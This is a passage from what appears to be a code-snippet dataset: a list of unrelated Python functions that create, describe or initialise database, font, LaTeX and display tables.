cursor.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS RunCollections (\n id INT AUTO_INCREMENT PRIMARY KEY,\n name VARCHAR(14) UNIQUE\n );\"\"\"\n )\n\n # This table holds in which run each appears.\n cursor.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS Runs (\n id INT AUTO_INCREMENT PRIMARY KEY,\n name VARCHAR(14) UNIQUE,\n collection_id INT,\n FOREIGN KEY (collection_id) REFERENCES RunCollections (id) ON DELETE CASCADE);\"\"\"\n )\n\n # This table holds resources, which can be in multiple runs and have multiple varieties\n cursor.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS Resources (\n id INT AUTO_INCREMENT PRIMARY KEY, \n extension VARCHAR(20), \n webpage VARCHAR(30),\n run_id INT NOT NULL,\n FOREIGN KEY (run_id) REFERENCES Runs (id) ON DELETE CASCADE);\"\"\"\n )\n\n cursor.execute(\n 'SELECT Table_name FROM information_schema.tables WHERE table_schema = \"vpntfg0\" AND Table_name LIKE \"%Varieties_%\" ORDER BY Table_name'\n )\n for row in cursor.fetchall():\n self.variety_tables.append(row[0])\n\n cursor.close()\n _logger.info(\"Variety tables are: %s\" % self.variety_tables)\n\n _logger.info(\"Database initialized\")", "def buildConverters(tableSpec, tableNamespace):\n converters = []\n convertersByName = {}\n for tp, name, repeat, aux, descr in tableSpec:\n tableName = name\n if name.startswith(\"ValueFormat\"):\n assert tp == \"uint16\"\n converterClass = ValueFormat\n elif name.endswith(\"Count\") or name in (\"StructLength\", \"MorphType\"):\n converterClass = {\n \"uint8\": ComputedUInt8,\n \"uint16\": ComputedUShort,\n \"uint32\": ComputedULong,\n }[tp]\n elif name == \"SubTable\":\n converterClass = SubTable\n elif name == \"ExtSubTable\":\n converterClass = ExtSubTable\n elif name == \"SubStruct\":\n converterClass = SubStruct\n elif name == \"FeatureParams\":\n converterClass = FeatureParams\n elif name in (\"CIDGlyphMapping\", \"GlyphCIDMapping\"):\n converterClass = StructWithLength\n else:\n if not tp in converterMapping and \"(\" not in tp:\n tableName = tp\n converterClass = Struct\n else:\n converterClass = eval(tp, tableNamespace, converterMapping)\n\n conv = converterClass(name, repeat, aux, description=descr)\n\n if conv.tableClass:\n # A \"template\" such as OffsetTo(AType) knowss the table class already\n tableClass = conv.tableClass\n elif tp in (\"MortChain\", \"MortSubtable\", \"MorxChain\"):\n tableClass = tableNamespace.get(tp)\n else:\n tableClass = tableNamespace.get(tableName)\n\n if not conv.tableClass:\n conv.tableClass = tableClass\n\n if name in [\"SubTable\", \"ExtSubTable\", \"SubStruct\"]:\n conv.lookupTypes = tableNamespace[\"lookupTypes\"]\n # also create reverse mapping\n for t in conv.lookupTypes.values():\n for cls in t.values():\n convertersByName[cls.__name__] = Table(name, repeat, aux, cls)\n if name == \"FeatureParams\":\n conv.featureParamTypes = tableNamespace[\"featureParamTypes\"]\n conv.defaultFeatureParams = tableNamespace[\"FeatureParams\"]\n for cls in conv.featureParamTypes.values():\n convertersByName[cls.__name__] = Table(name, repeat, aux, cls)\n converters.append(conv)\n assert name not in convertersByName, name\n convertersByName[name] = conv\n return converters, convertersByName", "def setup_table(self):\n\n self.setup.create_basic_table_in_dev()\n self.setup.insert_random_records_into_dev()", "def _process(self, tables=None):\n\n if self._tables:\n return self._tables\n\n tables = tables or {}\n\n for row in self.url.generator.iter_rp:\n\n table_id_key = row['Table ID'].strip().lower()\n\n if not row['Line Number'].strip():\n if 'Universe' not in row['Table Title']:\n if table_id_key not in tables:\n tables[table_id_key] = Table(row['Table ID'], row['Table Title'].strip().title(),\n seq=row['Sequence Number'],\n startpos=int(row['Start Position']))\n else:\n tables[table_id_key].seq = row['Sequence Number']\n tables[table_id_key].startpos = row['Start Position']\n tables[table_id_key].subject = row['Subject Area']\n\n else:\n tables[table_id_key].universe = row['Table Title'].replace('Universe: ', '').strip()\n\n else: # column row\n try:\n\n line_no = int(row['Line Number'])\n\n if not line_no in tables[table_id_key].columns:\n tables[table_id_key].columns[line_no] = Column(row['Table ID'],\n f\"{row['Table ID']}_{line_no:03}\",\n line_no,\n description=row['Table Title'])\n else:\n tables[table_id_key].columns[line_no].description = row['Table Title']\n\n\n except ValueError as e:\n # Headings, which have fractional line numebrs\n # print(row)\n pass\n\n self._tables = tables\n\n return self._tables", "def testLR0ParseTable(self):\r\n from pydsl.Parser.LR0 import _slr_build_parser_table, build_states_sets\r\n state_sets = build_states_sets(productionset0)\r\n self.assertEqual(len(state_sets), 5)\r\n #0 . EI: : . exp $ , \r\n # exp : .SR\r\n # transitions: S -> 2,\r\n # goto: exp -> 1\r\n #1 EI: exp . $ ,\r\n # transitions: $ -> 3\r\n #2 exp: S . R,\r\n # transitions: R -> 4\r\n #3 EI: exp $ .\r\n #4 exp: S R .\r\n # reduce\r\n\r\n parsetable = _slr_build_parser_table(productionset0)\r\n self.assertEqual(len(parsetable), 4)", "def init_tables(self) -> None:\n # TODO(#93) maybe raise flag when the schema of existing tables isn't what we expect\n # it to be?\n # \"How to know that schema changes?\"\n # logger.warning(\"some message\")\n with self.table_access_condition:\n conn = self._get_connection()\n conn.execute(\"PRAGMA foreign_keys = 1\")\n with conn:\n c = conn.cursor()\n c.execute(CREATE_PROJECTS_TABLE)\n c.execute(CREATE_TASKS_TABLE)\n c.execute(CREATE_REQUESTERS_TABLE)\n c.execute(CREATE_TASK_RUNS_TABLE)\n c.execute(CREATE_ASSIGNMENTS_TABLE)\n c.execute(CREATE_UNITS_TABLE)\n c.execute(CREATE_WORKERS_TABLE)\n c.execute(CREATE_AGENTS_TABLE)\n c.execute(CREATE_QUALIFICATIONS_TABLE)\n c.execute(CREATE_GRANTED_QUALIFICATIONS_TABLE)\n c.execute(CREATE_ONBOARDING_AGENTS_TABLE)", "def pre_interface_route_table_create(self, resource_dict):\n pass", "def _init_table(self, table: \"Table\"):\n if not self.columns:\n self.columns = table.columns\n self._data = table.data", "def __init__(self, *args):\n _snap.TTable_swiginit(self, _snap.new_TTable(*args))", "def generate_inicialization_file(id_test,lines,columns):\n \n def _generate_cell_initialization(outputFile,inputLine,fieldNames):\n print(\"_generate_cell_initialization\")\n outputFile.write(\"\\n\")\n outputFile.write(\"rule : { \\n\")\n port_idx =0\n for fieldName in fieldNames[1:]:\n port_idx=port_idx+1\n print(\"Writing \"+str(fieldName+\" for agent \"+str(inputLine[0])))\n outputFile.write(\"\\t\\t~\"+str(fieldName)+\"\\t\\t:= \"+str(inputLine[port_idx].strip())+\";\\n\")\n \n outputFile.write(\" } \\n\")\n outputFile.write(\" 0 \\n\")\n outputFile.write(\" { \\n\")\n outputFile.write(\"\\t\\t(0,0)~\"+fieldNames[1]+\"\\t = -\"+ \\\n str(inputLine[0])+\"\\n\")\n #str(DEFAULT_INITIAL_CELL_VALUE))\n outputFile.write(\" } \\n\")\n #outputFile.write()\n \n \n print(\"generate_inicialization_file\")\n initialization_output_file_name=\"inicializacion.inc\"\n initialization_input_file_name=id_test+\"_initialization.csv\"\n f_output = io.open(INPUT_PARSER_RESULTS_DIR+initialization_output_file_name, \"w\",newline='\\n')\n f_input = io.open(AGRODEVS_INPUT_DIR+initialization_input_file_name, \"r\")\n \n input_reader = csv.reader(f_input, delimiter=',')\n field_names_list = next(input_reader)\n if (field_names_list[0]!=\"agent\"):\n print(\"First field of inicialization input file should be 'agent' but is:\"+field_names_list[0])\n print(\"Cannot generate inicialization file for AgroDevs\")\n return\n else:\n print(field_names_list)\n #Write macro header line\n f_output.write(\"#BeginMacro(inicializar) \\n\")\n \n for line in input_reader:\n if (line[0]==\"default\"):\n #generate default cell initialization\n print(\"generating default cell initialization\")\n else:\n #generate agent cell initialization\n #print(\"generate agent cell initialization\")\n _generate_cell_initialization(f_output,line,field_names_list)\n \n f_output.write(\"#EndMacro \\n\") \n f_input.close()\n f_output.close()", "def init_tables(self) -> None:\n with self.table_access_condition:\n conn = self._get_connection()\n conn.execute(\"PRAGMA foreign_keys = 1\")\n c = conn.cursor()\n c.execute(tables.CREATE_STUDIES_TABLE)\n c.execute(tables.CREATE_SUBMISSIONS_TABLE)\n c.execute(tables.CREATE_REQUESTERS_TABLE)\n c.execute(tables.CREATE_UNITS_TABLE)\n c.execute(tables.CREATE_WORKERS_TABLE)\n c.execute(tables.CREATE_RUNS_TABLE)\n c.execute(tables.CREATE_RUN_MAP_TABLE)\n c.execute(tables.CREATE_PARTICIPANT_GROUPS_TABLE)\n c.execute(tables.CREATE_PARTICIPANT_GROUP_QUALIFICATIONS_MAPPING_TABLE)\n conn.commit()", "def __init__(self, spec, decl=None):\n self._spec = []\n self.initialize()\n self._processDecl(decl)\n self._processSpec(spec)", "def init_rib_tables(self):\n cur = self.sql.cursor()\n cur.execute(\"PRAGMA foreign_keys = on\")\n cur.execute('''\n CREATE TABLE rtr_cache (\n rtr_id INTEGER PRIMARY KEY NOT NULL,\n device TEXT NOT NULL,\n rtrupdt INTEGER,\n UNIQUE (device))''')\n cur.execute('''\n CREATE TABLE rtr_rib (\n rtr_id INTEGER NOT NULL\n REFERENCES rtr_cache(rtr_id)\n ON DELETE CASCADE\n ON UPDATE CASCADE,\n idx INTEGER NOT NULL,\n status TEXT,\n pfx TEXT NOT NULL,\n pfxlen INTEGER NOT NULL,\n pfxstr_min TEXT NOT NULL,\n pfxstr_max TEXT NOT NULL,\n nexthop TEXT NOT NULL,\n metric INTEGER,\n locpref INTEGER,\n weight INTEGER,\n pathbutone TEXT,\n orig_asn INTEGER NOT NULL,\n route_orig TEXT)''')\n self.sql.commit()", "def _create_intermediate_new_tables_structure(self, conn):\n table_names = []\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blacklist_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_lists_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_new_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT,\n is_blacklisted BOOLEAN\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_new_part_tblname,\n is_unlogged=True)\n\n tblname = self._blocking_conditions_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n cond_name TEXT NOT NULL,\n reason TEXT NOT NULL\n )\"\"\")\n .format(sql.Identifier(tblname)))\n table_names.append(tblname)\n\n tblname = self._mnc_mcc_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n mcc_mnc_pattern TEXT NOT NULL,\n operator_id TEXT NOT NULL\n )\"\"\")\n .format(sql.Identifier(tblname)))\n table_names.append(tblname)\n\n tblname = self._notifications_imei_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY RANGE (virt_imei_shard)\"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_triplets_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT,\n home_operator TEXT,\n fallback_operators TEXT[]\n ) PARTITION BY RANGE (virt_imei_shard)\"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._pairings_imei_imsi_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT,\n home_operator TEXT,\n is_blacklisted BOOLEAN\n ) PARTITION BY RANGE (virt_imei_shard) \"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True, fillfactor=45)\n table_names.append(tblname)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def __init__(\n self,\n tableCollection: str,\n activation: str,\n eigenTimeConst: str = \"\",\n expansionTimeConstant: str = \"\",\n ):\n pass", "def test_create_table(self):\n self.assertEqual(\n ['CREATE', 'TABLE', 'T1', '(\\nc1 ENUM(\"a\", \"b\", \"c\"), c2 SET(\"0\", \"1\", \"2\")\\n)'],\n grammar._CREATE_TABLE.parseString(\n 'CREATE TABLE IF NOT EXISTS `T1`(\\nc1 ENUM(\"a\", \"b\", \"c\"), c2 SET(\"0\", \"1\", \"2\")\\n);'\n ).asList()\n )", "def _create_TableDescriptor(self):\n\n self.conn.cursor.execute(\"PRAGMA table_info(\" + self.table_name + \")\")\n descriptions = self.conn.cursor.fetchall()\n column_map = {}\n for description in descriptions:\n column_map[description[1]] = description[2]\n td = TD(self.table_name, column_map) \n\n# self.conn.cursor.execute(\"SELECT sql FROM sqlite_master WHERE name='{tb}'\"\\\n# .format(tb=self.table_name))\n# aa = str(self.conn.cursor.fetchone()[0])\n# sindx = aa.find(\"(\")\n# eindx = aa.find(\")\")\n# aa = aa[sindx+1:eindx]\n# aa = aa.split(\",\")\n# column_map = {kyval.split()[0]:kyval.split()[1] for kyval in aa}\n# td = TD(self.table_name, column_map) \n\n return td", "def init_table(row_num):\n # Initialize the number of rows in table\n table = []\n for i in range(row_num):\n row = []\n table.append(row)\n\n # Append the default first cell to the table\n table[0].append(\"Curreny Type\")\n\n return table", "def _db_init_data_tables(self):\n\n #\n # TESTTYPE table\n #\n return self._db_execute(\n \"\"\"\n create table TESTTYPE (\n KEY text unique,\n VALUE text\n )\n \"\"\"\n )", "def defineTABLESECTION(f,layernamelist):\r\n \r\n layercolordict={}\r\n for layername in layernamelist:\r\n t=random.randint(10,17)\r\n layercolordict[layername]=random.randrange(10+t,240+t,10)\r\n \r\n layercolordict[\"Outline\"]=1\r\n layercolordict[\"Mark\"]=5\r\n layercolordict[\"Cutline\"]=2\r\n \r\n f.write(\"0\\nSECTION\\n2\\nTABLES\\n0\\nTABLE\\n2\\nLAYER\\n70\\n2\\n\") \r\n for layername in layernamelist:\r\n f.write(\"0\\nLAYER\\n2\\n\"+layername+\"\\n70\\n0\\n62\\n\"+str(layercolordict[layername])+\"\\n6\\nCONTINUOUS\\n\")\r\n f.write(\"0\\nENDTAB\\n0\\nENDSEC\\n\")", "def make_tables(\n table_cfgs: \"list[tuple[BitPos, BitPos, OffsetType]]\", entries\n) -> \"list[Table]\":\n tables = []\n entry_groups = [entries]\n for (low_bit, cap_bit, offset_type) in table_cfgs:\n table = Table(entry_groups, low_bit, cap_bit, offset_type)\n entry_groups = map(lambda bucket: bucket.entries(), table.buckets())\n tables.append(table)\n return tables", "def read_descriptions(args):\n\n table_list = check_output(\n 'echo \"show tables %s;\" | tql' % args.database, shell=True\n ).split(\n \"\\n\"\n )\n for table in table_list:\n table_details = table.split(\"|\")\n if len(table_details) >= 2:\n schema_name = table_details[0].strip()\n table_name = table_details[1].strip()\n\n schema = descriptions.get(schema_name, None)\n if schema is None:\n schema = {}\n\n table = schema.get(table_name, None)\n if table is None:\n table = {}\n\n column_list = check_output(\n 'echo \"show table %s.%s.%s;\" | tql'\n % (args.database, schema_name, table_name),\n shell=True,\n ).split(\n \"\\n\"\n )\n for column in column_list:\n column_details = column.split(\"|\")\n if len(column_details) >= 2:\n column_name = column_details[0].strip()\n column_type = column_details[2].strip()\n table[column_name] = column_type\n\n schema[table_name] = table\n descriptions[schema_name] = schema", "def prep(self):\n sq1 = 'create table TCVR ( ID, T, C, V, R , primary key ( ID ) ) ;'\n sq2 = 'create table IDX ( ID , A , primary key(A) ) ; '\n self.sq.SQX(sq1)\n self.sq.SQX(sq2)\n sq3 = \"insert into IDX VALUES ( 1 , 'A' ) ; \"\n self.sq.SQX(sq3)", "def visit_table(self, node: docutils.nodes.reference) -> None:\n self.entry = {}\n self.header = {}", "def _initialize(self):\n query_table = self._cursor.execute(f\"\"\"\n SELECT name\n FROM sqlite_master\n WHERE type='table' AND name='{self._table_name}';\"\"\")\n\n if not query_table.fetchone():\n self._cursor.execute(f\"\"\"\n CREATE TABLE {self._table_name} (\n id char(36),\n term TEXT,\n timestamp BIGINT\n );\"\"\")\n\n self._cursor.execute(f\"\"\"\n CREATE INDEX index_timestamp\n ON {self._table_name} (timestamp);\"\"\")\n\n self._conn.commit()", "def setup(self):\n self.table = prettytable.PrettyTable()\n self.table.field_names = self.titles\n if self.convert_columns:\n self.rows = self.convert_columns_to_rows(self.rows)\n if self.colour:\n self.colour = self.convert_columns_to_rows(self.colour)", "def generate_table(self, rows):\n ...", "def pre_route_table_create(self, resource_dict):\n pass", "def _add_table_schema(table_desc, table_name, schema):\n table_desc['TableName'] = table_name\n table_desc['AttributeDefinitions'] = [{\n 'AttributeName': item['name'],\n 'AttributeType': DynamoStubber._encode_type(item['type'])\n } for item in schema]\n table_desc['KeySchema'] = [{\n 'AttributeName': item['name'],\n 'KeyType': item['key_type']\n } for item in schema]", "def table_fields() -> Dict[str, TableFieldDetails]:\n return {\n \"REPEATS\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=0,\n bit_high=15,\n description=\"Number of times the line will repeat\",\n labels=None,\n ),\n \"TRIGGER\": TableFieldDetails(\n subtype=\"enum\",\n bit_low=16,\n bit_high=19,\n description=\"The trigger condition to start the phases\",\n labels=[\n \"Immediate\",\n \"BITA=0\",\n \"BITA=1\",\n \"BITB=0\",\n \"BITB=1\",\n \"BITC=0\",\n \"BITC=1\",\n \"POSA>=POSITION\",\n \"POSA<=POSITION\",\n \"POSB>=POSITION\",\n \"POSB<=POSITION\",\n \"POSC>=POSITION\",\n \"POSC<=POSITION\",\n ],\n ),\n \"POSITION\": TableFieldDetails(\n subtype=\"int\",\n bit_low=32,\n bit_high=63,\n description=\"The position that can be used in trigger condition\",\n labels=None,\n ),\n \"TIME1\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=64,\n bit_high=95,\n description=\"The time the optional phase 1 should take\",\n labels=None,\n ),\n \"OUTA1\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=20,\n bit_high=20,\n description=\"Output A value during phase 1\",\n labels=None,\n ),\n \"OUTB1\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=21,\n bit_high=21,\n description=\"Output B value during phase 1\",\n labels=None,\n ),\n \"OUTC1\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=22,\n bit_high=22,\n description=\"Output C value during phase 1\",\n labels=None,\n ),\n \"OUTD1\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=23,\n bit_high=23,\n description=\"Output D value during phase 1\",\n labels=None,\n ),\n \"OUTE1\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=24,\n bit_high=24,\n description=\"Output E value during phase 1\",\n labels=None,\n ),\n \"OUTF1\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=25,\n bit_high=25,\n description=\"Output F value during phase 1\",\n labels=None,\n ),\n \"TIME2\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=96,\n bit_high=127,\n description=\"The time the mandatory phase 2 should take\",\n labels=None,\n ),\n \"OUTA2\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=26,\n bit_high=26,\n description=\"Output A value during phase 2\",\n labels=None,\n ),\n \"OUTB2\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=27,\n bit_high=27,\n description=\"Output B value during phase 2\",\n labels=None,\n ),\n \"OUTC2\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=28,\n bit_high=28,\n description=\"Output C value during phase 2\",\n labels=None,\n ),\n \"OUTD2\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=29,\n bit_high=29,\n description=\"Output D value during phase 2\",\n labels=None,\n ),\n \"OUTE2\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=30,\n bit_high=30,\n description=\"Output E value during phase 2\",\n labels=None,\n ),\n \"OUTF2\": TableFieldDetails(\n subtype=\"uint\",\n bit_low=31,\n bit_high=31,\n description=\"Output F value during phase 2\",\n labels=None,\n ),\n }", "def setup_latex_table(self, tabletype, injected):\n self.texfile.write(r\"\\\\renewcommand{\\\\arraystretch}{1.6}\\n\")\n self.texfile.write(r\"\\n\")\n self.texfile.write(r\"\\\\begin{table}[t!]\\n\")\n self.texfile.write(r\" \\\\begin{center}\\n\")\n if tabletype == 'fiducial_fit_params':\n if injected:\n nextline = r\" \\\\begin{tabu} to 1.0\\\\textwidth \"\n nextline += r\"{| X[2.0,c] | X[1,c] | X[1,c] | X[1,c]\"\n nextline += r\" | X[1,c] | X[1,c] | X[1,c] | X[1,c] |}\\n\"\n self.texfile.write(nextline)\n self.texfile.write(r\" \\hline\\n\")\n nextline = r\" \\multirow{2}{*}{\\\\textbf{Parameter}} \"\n nextline += r\"& \\multirow{2}{*}{\\\\textbf{Inj}} \"\n nextline += r\"& \\multicolumn{3}{c|}{h0} \"\n nextline += r\"& \\multicolumn{3}{c|}{h1} \"\n nextline += r\"\\\\\\\\ \\cline{3-8}\"\n self.texfile.write(nextline)\n nextline = r\" & & Prior & Fit & \\(\\Delta\\) \"\n nextline += r\"& Prior & Fit & \\(\\Delta\\) \\\\\\\\ \\hline\\n\"\n self.texfile.write(nextline)\n else:\n nextline = r\" \\\\begin{tabu} to 1.0\\\\textwidth \"\n nextline += r\"{| X[c] | X[c] | X[c] |}\\n\"\n self.texfile.write(nextline)\n self.texfile.write(r\" \\hline\\n\")\n self.texfile.write(r\" Parameter & h0 & h1 \\\\\\\\ \\hline\\n\")\n elif tabletype == 'fiducial_fit_metrics':\n nextline = r\" \\\\begin{tabu} to 1.0\\\\textwidth \"\n nextline += r\"{| X[c] | X[c] | X[c] |}\\n\"\n self.texfile.write(nextline)\n self.texfile.write(r\" \\hline\\n\")\n self.texfile.write(r\" h0 & h1 & $\\Delta$ \\\\\\\\ \\hline\\n\")\n else:\n raise ValueError(\n \"This function is only for making fit metric or fit \"\n \"param tables in LaTeX. Got type %s\"%tabletype\n )", "def init_blank(self, T):\n self.headings = []\n self.table = {}\n self.rowcount = 0\n for e in T.entries:\n self.headings.append(e.name)\n self.table[e.name] = []", "def _table_step(self, op: data_algebra.data_ops_types.OperatorPlatform, *, data_map: Dict[str, Any]):\n if op.node_name != \"TableDescription\":\n raise TypeError(\n \"op was supposed to be a data_algebra.data_ops.TableDescription\"\n )\n res = data_map[op.table_name]\n if not self.is_appropriate_data_instance(res):\n raise ValueError(\n \"data_map[\" + op.table_name + \"] was not the right type\"\n )\n if self.use_lazy_eval and (not isinstance(res, pl.LazyFrame)):\n res = res.lazy()\n res = res.select(op.columns_produced())\n return res", "def prepare_for_table(data, machine_id):\n\n defint = lambda x: 0 if x == '' else int(x)\n\n keep_and_convert = {\n 'MESSAGE': str,\n 'PRIORITY': defint,\n '__REALTIME_TIMESTAMP': defint,\n '_PID': defint,\n '_UID': defint,\n '_SYSTEMD_UNIT': str,\n 'SYSLOG_IDENTIFIER': str,\n '_COMM': str,\n }\n result = dict((key, converter(data.get(key, ''))) for key, converter in keep_and_convert.items())\n result['MACHINE_ID'] = machine_id\n return data['__CURSOR'], result", "def from_description(cls, desc):\n table = desc['Table']\n throughput = table['ProvisionedThroughput']\n attrs = {}\n for data in table.get('AttributeDefinitions', []):\n field = TableField(data['AttributeName'],\n TYPES_REV[data['AttributeType']])\n attrs[field.name] = field\n for data in table.get('KeySchema', []):\n name = data['AttributeName']\n attrs[name].key_type = data['KeyType']\n for index in table.get('LocalSecondaryIndexes', []):\n for data in index['KeySchema']:\n if data['KeyType'] == 'RANGE':\n name = data['AttributeName']\n index_type = index['Projection']['ProjectionType']\n includes = index['Projection'].get('NonKeyAttributes')\n attrs[name] = attrs[name].to_index(index_type,\n index['IndexName'],\n includes)\n break\n global_indexes = {}\n for index in table.get('GlobalSecondaryIndexes', []):\n idx = GlobalIndex.from_description(index, attrs)\n global_indexes[idx.name] = idx\n return cls(table['TableName'], table['TableStatus'], attrs,\n global_indexes, throughput['ReadCapacityUnits'],\n throughput['WriteCapacityUnits'],\n throughput['NumberOfDecreasesToday'],\n table['TableSizeBytes'], table['ItemCount'],)", "def make_tables(self):\n for t in self.tables:\n self.add_table(groupname=t['groupname'],\n tablename=t['tablename'],\n description=t['description'],\n tabletitle=t['tabletitle'])", "def _initChoiceTable(self):\n\n t = self.tableWidget_choice_list # shorthand notation\n\n ### Header popluation & properties\n '''\n for (i, col_name) in enumerate(self.data.col_name_list):\n # Order the column labels as in the order of the definition\n # of the dictionary for the element property names and the\n # column names\n t.horizontalHeaderItem(i).setText(col_name)\n '''\n # or\n t.setHorizontalHeaderLabels(self.data.col_name_list)\n\n t.horizontalHeader().setMovable(True)", "def init_evtable(self, table):\n if table.height:\n # enforced height of each paged table, plus space for evmore extras\n self.height = table.height - 4\n\n # convert table to string\n text = str(table)\n self._justify = False\n self._justify_kwargs = None # enforce\n self.init_str(text)", "def __init__(self, flowchart=None, extension=None):\n logger.debug(\"Creating Table {}\".format(self))\n\n # Initialize our parent class\n super().__init__(\n flowchart=flowchart, title=\"Table\", extension=extension, logger=logger\n )\n\n # This needs to be after initializing subclasses...\n self.parameters = table_step.TableParameters()\n self.calls = 0", "def create_table(cls, *args, **kwargs):\n init = cls._meta.database.create_table_title(cls._meta.table_name)\n i = 1\n fields = zip(cls._meta.sorted_fields_names, cls._meta.sorted_fields)\n for field in fields:\n field_string = field[1].create_field(field[0])\n if i == len(fields):\n if cls._meta.unique:\n init = cls._meta.database.create_unique(init, cls._meta.unique)\n\n init = cls._meta.database.create_table_field_end(init, field_string)\n\n if cls._meta.hypertable:\n init = cls._meta.database.create_hypertable(init,\n cls._meta)\n else:\n init = cls._meta.database.create_table_field(init, field_string)\n i+=1\n\n yield cls._meta.database.runOperation(init)", "def test_cap_table_formats(logger, dbsession, network, scanned_distribution, web3):\n\n identity_provider = NullIdentityProvider()\n\n token_address = scanned_distribution\n for sort_direction in [\"asc\", \"desc\"]:\n for sort_order in [\"address\", \"name\", \"balance\", \"updated\"]:\n generate_cap_table(\n logger,\n dbsession,\n token_address,\n order_by=sort_order,\n identity_provider=identity_provider,\n order_direction=sort_direction,\n include_empty=False,\n TokenScanStatus=TokenScanStatus,\n TokenHolderAccount=TokenHolderAccount,\n )", "def init_analysis_tables(self):\n cur = self.sql.cursor()\n cur.execute(\"PRAGMA foreign_keys = on\")\n cur.execute('''\n CREATE TABLE report_index (\n report_id INTEGER PRIMARY KEY AUTOINCREMENT,\n report_hash TEXT NOT NULL,\n device TEXT NOT NULL,\n timestamp INTEGER NOT NULL)''')\n cur.execute('''\n CREATE TABLE report_detail (\n route_id INTEGER PRIMARY KEY AUTOINCREMENT,\n report_hash TEXT NOT NULL,\n invalid TEXT NOT NULL,\n status TEXT NOT NULL,\n pfx TEXT NOT NULL,\n pfxlen TEXT NOT NULL,\n pfxstr_min TEXT NOT NULL,\n pfxstr_max TEXT NOT NULL,\n nexthop TEXT NOT NULL,\n metric TEXT NOT NULL,\n locpref TEXT NOT NULL,\n weight TEXT NOT NULL,\n pathbutone TEXT NOT NULL,\n orig_asn TEXT NOT NULL,\n route_orig TEXT NOT NULL)''')\n cur.execute('''\n CREATE TABLE fconstraints (\n fcons_id INTEGER PRIMARY KEY AUTOINCREMENT,\n route_id TEXT NOT NULL\n REFERENCES report_detail(route_id),\n host TEXT NOT NULL,\n port TEXT NOT NULL,\n asn TEXT NOT NULL,\n prefix TEXT NOT NULL,\n prefixlen INTEGER NOT NULL,\n max_prefixlen INTEGER NOT NULL)''')\n self.sql.commit()", "def help_description():\n # for ain\n print(\"--------TABLE FOR AIN(AIN4=GND)-------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | AINP | AINN |\")\n for i in range(8):\n print(\"| {} | {} | AIN{} | AIN{} |\".format(str(i), bin(i)[2:].zfill(3), 